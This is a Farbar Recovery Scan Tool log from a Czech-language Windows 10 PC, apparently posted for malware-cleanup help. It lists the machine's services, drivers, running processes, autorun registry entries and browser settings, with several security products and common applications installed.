U3 vmicvss; C:\WINDOWS\System32\icsvcext.dll [349696 2017-03-04] (Microsoft Corporation) [File not signed]
U3 VSS; C:\WINDOWS\system32\vssvc.exe [1443328 2017-03-04] (Microsoft Corporation) [File not signed]
U3 W32Time; C:\WINDOWS\system32\w32time.dll [520192 2016-09-27] (Microsoft Corporation) [File not signed]
U3 WalletService; C:\WINDOWS\system32\WalletService.dll [436224 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wbengine; C:\WINDOWS\system32\wbengine.exe [1547264 2017-03-04] (Microsoft Corporation) [File not signed]
U2 WbioSrvc; C:\WINDOWS\System32\wbiosrvc.dll [837632 2016-12-14] (Microsoft Corporation) [File not signed]
U2 Wcmsvc; C:\WINDOWS\System32\wcmsvc.dll [715776 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wcncsvc; C:\WINDOWS\System32\wcncsvc.dll [468992 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiServiceHost; C:\WINDOWS\system32\wdi.dll [97792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiServiceHost; C:\WINDOWS\SysWOW64\wdi.dll [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiSystemHost; C:\WINDOWS\system32\wdi.dll [97792 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdiSystemHost; C:\WINDOWS\SysWOW64\wdi.dll [89088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
U3 WebClient; C:\WINDOWS\System32\webclnt.dll [227328 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WebClient; C:\WINDOWS\SysWOW64\webclnt.dll [198656 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Wecsvc; C:\WINDOWS\system32\wecsvc.dll [206848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WEPHOSTSVC; C:\WINDOWS\system32\wephostsvc.dll [27648 2016-07-16] (Microsoft Corporation) [File not signed]
U3 wercplsupport; C:\WINDOWS\System32\wercplsupport.dll [94208 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WerSvc; C:\WINDOWS\System32\WerSvc.dll [156672 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WiaRpc; C:\WINDOWS\System32\wiarpc.dll [82944 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103712 2017-03-04] (Microsoft Corporation)
U3 WinHttpAutoProxySvc; C:\WINDOWS\system32\winhttp.dll [818176 2017-03-04] (Microsoft Corporation) [File not signed]
U3 WinHttpAutoProxySvc; C:\WINDOWS\SysWOW64\winhttp.dll [636928 2017-03-04] (Microsoft Corporation) [File not signed]
U2 Winmgmt; C:\WINDOWS\system32\wbem\WMIsvc.dll [222720 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WinRM; C:\WINDOWS\system32\WsmSvc.dll [2716672 2016-11-11] (Microsoft Corporation) [File not signed]
U3 WinRM; C:\WINDOWS\SysWOW64\WsmSvc.dll [2333184 2016-11-11] (Microsoft Corporation) [File not signed]
U3 wisvc; C:\WINDOWS\system32\flightsettings.dll [635904 2017-03-04] (Microsoft Corporation) [File not signed]
U4 WkSvw32.exe; C:\Program Files (x86)\WIBUKEY\Server\WkSvw32.exe [659336 2013-12-18] (WIBU-SYSTEMS AG)
U3 WlanSvc; C:\WINDOWS\System32\wlansvc.dll [2370048 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wlidsvc; C:\WINDOWS\system32\wlidsvc.dll [2104320 2016-11-11] (Microsoft Corporation) [File not signed]
U3 wmiApSrv; C:\WINDOWS\system32\wbem\WmiApSrv.exe [203264 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WMPNetworkSvc; C:\Program Files\Windows Media Player\wmpnetwk.exe [1184256 2016-09-27] (Microsoft Corporation) [File not signed]
U3 workfolderssvc; C:\WINDOWS\system32\workfolderssvc.dll [1837056 2017-03-04] (Microsoft Corporation) [File not signed]
U3 WPDBusEnum; C:\WINDOWS\system32\wpdbusenum.dll [88064 2016-07-16] (Microsoft Corporation) [File not signed]
U2 WpnService; C:\WINDOWS\system32\WpnService.dll [234496 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WpnUserService; C:\WINDOWS\System32\WpnUserService.dll [74240 2016-07-16] (Microsoft Corporation) [File not signed]
U2 wscsvc; C:\WINDOWS\System32\wscsvc.dll [184832 2016-11-11] (Microsoft Corporation) [File not signed]
U4 WSearch; C:\WINDOWS\system32\SearchIndexer.exe [903680 2017-03-04] (Microsoft Corporation) [File not signed]
U4 WSearch; C:\WINDOWS\SysWOW64\SearchIndexer.exe [773120 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wuauserv; C:\WINDOWS\system32\wuaueng.dll [2317824 2017-03-04] (Microsoft Corporation) [File not signed]
U3 wudfsvc; C:\WINDOWS\System32\WUDFSvc.dll [99840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 WwanSvc; C:\WINDOWS\System32\wwansvc.dll [1282048 2017-03-04] (Microsoft Corporation) [File not signed]
U3 XblAuthManager; C:\WINDOWS\System32\XblAuthManager.dll [1016320 2017-03-04] (Microsoft Corporation) [File not signed]
U3 XblGameSave; C:\WINDOWS\System32\XblGameSave.dll [1159680 2016-07-16] (Microsoft Corporation) [File not signed]
U3 XboxNetApiSvc; C:\WINDOWS\system32\XboxNetApiSvc.dll [1025536 2017-03-04] (Microsoft Corporation) [File not signed]
U2 ZAMSvc; C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
U2 NVIDIA Wireless Controller Service; "C:\Program Files\NVIDIA Corporation\GeForce Experience Service\nvwirelesscontroller.exe" [X]
U3 OverwolfUpdater; "C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe" /RunningFrom SCM" [X]
===================== Drivers (Whitelisted) ======================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
U3 1394ohci; C:\WINDOWS\System32\drivers\1394ohci.sys [235520 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AcpiDev; C:\WINDOWS\System32\drivers\AcpiDev.sys [18432 2016-07-16] (Microsoft Corporation) [File not signed]
U3 acpipagr; C:\WINDOWS\System32\drivers\acpipagr.sys [12288 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AcpiPmi; C:\WINDOWS\System32\drivers\acpipmi.sys [14336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 acpitime; C:\WINDOWS\System32\drivers\acpitime.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ahcache; C:\WINDOWS\System32\DRIVERS\ahcache.sys [227328 2016-10-15] (Microsoft Corporation) [File not signed]
U3 AmdK8; C:\WINDOWS\System32\drivers\amdk8.sys [123392 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AmdPPM; C:\WINDOWS\System32\drivers\amdppm.sys [120832 2016-07-16] (Microsoft Corporation) [File not signed]
U3 applockerfltr; C:\WINDOWS\System32\drivers\applockerfltr.sys [15360 2016-07-16] (Microsoft Corporation) [File not signed]
U3 AsyncMac; C:\WINDOWS\System32\drivers\asyncmac.sys [28160 2016-07-16] (Microsoft Corporation) [File not signed]
U1 BasicDisplay; C:\WINDOWS\System32\drivers\BasicDisplay.sys [56320 2016-07-16] (Microsoft Corporation) [File not signed]
U1 BasicRender; C:\WINDOWS\System32\drivers\BasicRender.sys [41472 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bcmfn; C:\WINDOWS\System32\drivers\bcmfn.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider) [File not signed]
U3 bcmfn2; C:\WINDOWS\System32\drivers\bcmfn2.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider) [File not signed]
U1 Beep; C:\Windows\System32\Drivers\Beep.sys [9728 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bowser; C:\WINDOWS\System32\DRIVERS\bowser.sys [101888 2016-11-02] (Microsoft Corporation) [File not signed]
U3 BthAvrcpTg; C:\WINDOWS\System32\drivers\BthAvrcpTg.sys [43008 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BthHFEnum; C:\WINDOWS\System32\drivers\bthhfenum.sys [65536 2016-07-16] (Microsoft Corporation) [File not signed]
U3 bthhfhid; C:\WINDOWS\System32\drivers\BthHFHid.sys [31232 2016-07-16] (Microsoft Corporation) [File not signed]
U3 BTHMODEM; C:\WINDOWS\System32\drivers\bthmodem.sys [66048 2016-07-16] (Microsoft Corporation) [File not signed]
U3 buttonconverter; C:\WINDOWS\System32\drivers\buttonconverter.sys [38912 2016-07-16] (Microsoft Corporation) [File not signed]
U3 CapImg; C:\WINDOWS\System32\drivers\capimg.sys [118272 2016-09-10] (Microsoft Corporation) [File not signed]
U4 cdfs; C:\WINDOWS\System32\DRIVERS\cdfs.sys [92160 2016-07-16] (Microsoft Corporation) [File not signed]
U1 cdrom; C:\WINDOWS\System32\drivers\cdrom.sys [173056 2016-07-16] (Microsoft Corporation) [File not signed]
U3 circlass; C:\WINDOWS\System32\drivers\circlass.sys [48640 2016-07-16] (Microsoft Corporation) [File not signed]
U2 clreg; C:\WINDOWS\System32\drivers\registry.sys [70144 2016-07-16] (Microsoft Corporation) [File not signed]
U3 CmBatt; C:\WINDOWS\System32\drivers\CmBatt.sys [29696 2016-07-16] (Microsoft Corporation) [File not signed]
U1 cmderd; C:\WINDOWS\System32\DRIVERS\cmderd.sys [40952 2016-12-16] (COMODO)
U1 cmdGuard; C:\WINDOWS\System32\DRIVERS\cmdguard.sys [828360 2016-12-16] (COMODO)
U1 cmdhlp; C:\WINDOWS\system32\DRIVERS\cmdhlp.sys [50288 2016-12-16] (COMODO)
U3 CompositeBus; C:\WINDOWS\System32\DriverStore\FileRepository\compositebus.inf_amd64_a140581a8f8b58b7\CompositeBus.sys [39936 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Dfsc; C:\WINDOWS\System32\Drivers\dfsc.sys [145408 2017-03-04] (Microsoft Corporation) [File not signed]
U3 dmvsc; C:\WINDOWS\System32\drivers\dmvsc.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2015-08-26] (Disc Soft Ltd)
U1 ElRawDisk; C:\Windows\system32\drivers\ElRawDsk.sys [30752 2013-12-03] (EldoS Corporation)
U3 ErrDev; C:\WINDOWS\System32\drivers\errdev.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77408 2017-02-24] ()
U3 exfat; C:\Windows\System32\Drivers\exfat.sys [334848 2016-07-16] (Microsoft Corporation) [File not signed]
U3 fdc; C:\WINDOWS\System32\drivers\fdc.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U1 FileCrypt; C:\WINDOWS\System32\drivers\filecrypt.sys [88576 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Filetrace; C:\WINDOWS\System32\drivers\filetrace.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U3 flpydisk; C:\WINDOWS\System32\drivers\flpydisk.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 gencounter; C:\WINDOWS\System32\drivers\vmgencounter.sys [13312 2016-07-16] (Microsoft Corporation) [File not signed]
U3 genericusbfn; C:\WINDOWS\System32\drivers\genericusbfn.sys [20480 2016-07-16] (Microsoft Corporation) [File not signed]
U1 GpuEnergyDrv; C:\WINDOWS\System32\drivers\gpuenergydrv.sys [8192 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HDAudBus; C:\WINDOWS\System32\drivers\HDAudBus.sys [83456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidBth; C:\WINDOWS\System32\drivers\hidbth.sys [108032 2016-07-16] (Microsoft Corporation) [File not signed]
U3 hidi2c; C:\WINDOWS\System32\drivers\hidi2c.sys [51200 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidIr; C:\WINDOWS\System32\drivers\hidir.sys [46592 2016-07-16] (Microsoft Corporation) [File not signed]
U3 HidUsb; C:\WINDOWS\System32\drivers\hidusb.sys [38400 2016-09-27] (Microsoft Corporation) [File not signed]
U3 hyperkbd; C:\WINDOWS\System32\drivers\hyperkbd.sys [16384 2016-07-16] (Microsoft Corporation) [File not signed]
U3 i8042prt; C:\WINDOWS\System32\drivers\i8042prt.sys [114176 2016-07-16] (Microsoft Corporation) [File not signed]
U3 iagpio; C:\WINDOWS\System32\drivers\iagpio.sys [33280 2016-07-16] (Intel(R) Corporation) [File not signed]
U3 iai2c; C:\WINDOWS\System32\drivers\iai2c.sys [81408 2016-07-16] (Intel(R) Corporation) [File not signed]
U3 iaLPSS2i_GPIO2; C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [64512 2016-07-16] (Intel Corporation) [File not signed]
U3 iaLPSS2_UART2; C:\WINDOWS\System32\drivers\iaLPSS2_UART2.sys [273168 2015-05-04] (Intel Corporation)
U3 iaLPSSi_I2C; C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [113152 2016-07-16] (Intel Corporation) [File not signed]
U3 IndirectKmd; C:\WINDOWS\System32\drivers\IndirectKmd.sys [35840 2016-07-16] (Microsoft Corporation) [File not signed]
U1 inspect; C:\WINDOWS\system32\DRIVERS\inspect.sys [127144 2016-12-16] (COMODO)
U3 intelppm; C:\WINDOWS\System32\drivers\intelppm.sys [134144 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IpFilterDriver; C:\WINDOWS\System32\DRIVERS\ipfltdrv.sys [85504 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IPNAT; C:\WINDOWS\System32\drivers\ipnat.sys [212480 2016-07-16] (Microsoft Corporation) [File not signed]
U3 irda; C:\WINDOWS\system32\drivers\irda.sys [120320 2016-07-16] (Microsoft Corporation) [File not signed]
U3 IRENUM; C:\WINDOWS\System32\drivers\irenum.sys [19456 2016-07-16] (Microsoft Corporation) [File not signed]
U3 kbdhid; C:\WINDOWS\System32\drivers\kbdhid.sys [39424 2016-09-15] (Microsoft Corporation) [File not signed]
U3 kdnic; C:\WINDOWS\System32\drivers\kdnic.sys [25088 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ksthunk; C:\WINDOWS\system32\drivers\ksthunk.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U2 lltdio; C:\WINDOWS\System32\drivers\lltdio.sys [66048 2016-07-16] (Microsoft Corporation) [File not signed]
U2 luafv; C:\WINDOWS\system32\drivers\luafv.sys [125952 2016-07-16] (Microsoft Corporation) [File not signed]
U2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [186304 2017-03-15] (Malwarebytes)
U3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [111544 2017-03-15] (Malwarebytes)
U3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-03-15] (Malwarebytes)
U3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [251840 2017-03-15] (Malwarebytes)
U3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [92088 2017-03-16] (Malwarebytes)
U2 MMCSS; C:\WINDOWS\system32\drivers\mmcss.sys [48128 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Modem; C:\WINDOWS\System32\drivers\modem.sys [42496 2016-11-11] (Microsoft Corporation) [File not signed]
U3 monitor; C:\WINDOWS\System32\drivers\monitor.sys [38400 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mouhid; C:\WINDOWS\System32\drivers\mouhid.sys [32256 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mpsdrv; C:\WINDOWS\System32\drivers\mpsdrv.sys [75776 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MRxDAV; C:\WINDOWS\system32\drivers\mrxdav.sys [143872 2016-10-05] (Microsoft Corporation) [File not signed]
U2 mrxsmb10; C:\WINDOWS\System32\DRIVERS\mrxsmb10.sys [282624 2016-11-11] (Microsoft Corporation) [File not signed]
U3 MsBridge; C:\WINDOWS\System32\drivers\bridge.sys [114688 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mshidkmdf; C:\WINDOWS\System32\drivers\mshidkmdf.sys [8704 2016-07-16] (Microsoft Corporation) [File not signed]
U3 mshidumdf; C:\WINDOWS\System32\drivers\mshidumdf.sys [11776 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSKSSRV; C:\WINDOWS\system32\DRIVERS\MSKSSRV.sys [27136 2017-03-04] (Microsoft Corporation) [File not signed]
U2 MsLldp; C:\WINDOWS\System32\drivers\mslldp.sys [78336 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSPCLOCK; C:\WINDOWS\system32\DRIVERS\MSPCLOCK.sys [10752 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSPQM; C:\WINDOWS\system32\DRIVERS\MSPQM.sys [10752 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MSTEE; C:\WINDOWS\system32\DRIVERS\MSTEE.sys [12800 2016-07-16] (Microsoft Corporation) [File not signed]
U3 MTConfig; C:\WINDOWS\System32\drivers\MTConfig.sys [15872 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NativeWifiP; C:\WINDOWS\System32\DRIVERS\nwifi.sys [535552 2017-03-04] (Microsoft Corporation) [File not signed]
U3 NdisCap; C:\WINDOWS\System32\drivers\ndiscap.sys [50176 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisImPlatform; C:\WINDOWS\System32\drivers\NdisImPlatform.sys [126464 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisTapi; C:\WINDOWS\System32\DRIVERS\ndistapi.sys [26112 2016-07-16] (Microsoft Corporation) [File not signed]
U3 Ndisuio; C:\WINDOWS\System32\drivers\ndisuio.sys [63488 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisVirtualBus; C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [20480 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NdisWan; C:\WINDOWS\System32\drivers\ndiswan.sys [189440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ndiswanlegacy; C:\WINDOWS\System32\DRIVERS\ndiswan.sys [189440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 ndproxy; C:\WINDOWS\System32\DRIVERS\NDProxy.sys [60928 2016-07-16] (Microsoft Corporation) [File not signed]
U2 Ndu; C:\WINDOWS\System32\drivers\Ndu.sys [125440 2016-07-16] (Microsoft Corporation) [File not signed]
U3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] () [File not signed]
U1 NetBT; C:\WINDOWS\System32\DRIVERS\netbt.sys [279040 2016-07-16] (Microsoft Corporation) [File not signed]
U1 Npfs; C:\Windows\System32\Drivers\Npfs.sys [68608 2016-07-16] (Microsoft Corporation) [File not signed]
U1 npsvctrig; C:\WINDOWS\System32\drivers\npsvctrig.sys [26624 2016-07-16] (Microsoft Corporation) [File not signed]
Ran by Nekut (administrator) on DESKTOP-S3S217H (16-03-2017 16:46:58)
Running from C:\Users\Nekut\Desktop
Loaded Profiles: Nekut (Available Profiles: Nekut)
Platform: Windows 10 Home Version 1607 (X64) Language: Czech (Czech Republic)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/33 ... scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Autodesk Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AdAppMgrSvc.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodag.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.1051_none_7f2bf7ea21d201b2\TiWorker.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdagent.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cavwp.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\CisTray.exe
(Bitsum LLC) C:\Program Files\Process Lasso\ProcessLasso.exe
(Bitsum LLC) C:\Program Files\Process Lasso\ProcessGovernor.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cis.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodtray.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvspcaps64.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\ShadowPlay\nvsphelper64.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA Share.exe
(Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(Autodesk, Inc.) C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Autodesk, Inc.) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk) C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AcWebBrowser\acwebbrowser.exe
(Autodesk Inc.) C:\Windows\Temp\AdAppMgrUpdater.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(Copyright 2017.) C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
(COMODO) C:\Program Files\COMODO\COMODO Internet Security\cmdvirth.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-08-21] (Realtek Semiconductor)
HKLM\...\Run: [OODefragTray] => C:\Program Files\OO Software\Defrag\oodtray.exe [4465448 2014-08-29] (O&O Software GmbH)
HKLM\...\Run: [ShadowPlay] => "C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [MRT] => C:\WINDOWS\system32\MRT.exe [138634176 2017-03-14] (Microsoft Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1519800 2016-12-28] (COMODO)
HKLM\...\Run: [ZAM] => C:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
HKLM-x32\...\Run: [Autodesk Desktop App] => C:\Program Files (x86)\Autodesk\Autodesk Desktop App\AutodeskDesktopApp.exe [721856 2016-07-01] (Autodesk, Inc.)
HKLM-x32\...\Run: [4StoryPrePatch] => C:\Program Files (x86)\GameforgeLive\Games\CZE_ces\4Story\PrePatch.exe
HKLM-x32\...\Run: [GameforgeLive] => "C:\Program Files (x86)\GameforgeLive\gfl_client.exe" -autostart
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [DAEMON Tools Lite Automount] => C:\Program Files\DAEMON Tools Lite\DTAgent.exe [4468056 2015-06-18] (Disc Soft Ltd)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [BitTorrent] => C:\Users\Nekut\AppData\Roaming\BitTorrent\BitTorrent.exe [1984200 2017-02-14] (BitTorrent Inc.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [2860832 2016-10-13] (Valve Corporation)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [9105112 2016-11-15] (Piriform Ltd)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\Policies\Explorer: []
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\...\MountPoints2: {cb3db3c3-4bfd-11e5-9bdf-d8cb8a9936d5} - "F:\setup.exe"
HKU\S-1-5-18\...\Run: [Autodesk Sync] => C:\Program Files\Autodesk\Autodesk Sync\AdSync.exe [1283112 2016-02-02] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2016-02-07] (Autodesk, Inc.)
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\O&O Defrag Tray.lnk [2017-03-01]
ShortcutTarget: O&O Defrag Tray.lnk -> C:\Windows\Installer\{50C961A1-889F-4A4E-9587-2772A45B6AAD}\app_icon.ico ()
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.20 192.168.10.1
Tcpip\..\Interfaces\{6ad7d0b9-d1fb-40da-b893-a182542204a7}: [DhcpNameServer] 192.168.1.20 192.168.10.1
Internet Explorer:
==================
HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://ww.google.cz/
SearchScopes: HKU\S-1-5-21-2417313614-488722605-2671369154-1001 -> {012E1000-F331-11DB-8314-0800200C9A66} URL = hxxp://www.google.com/search?q={searchTerms}
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\ssv.dll [2015-11-25] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-11-25] (Oracle Corporation)
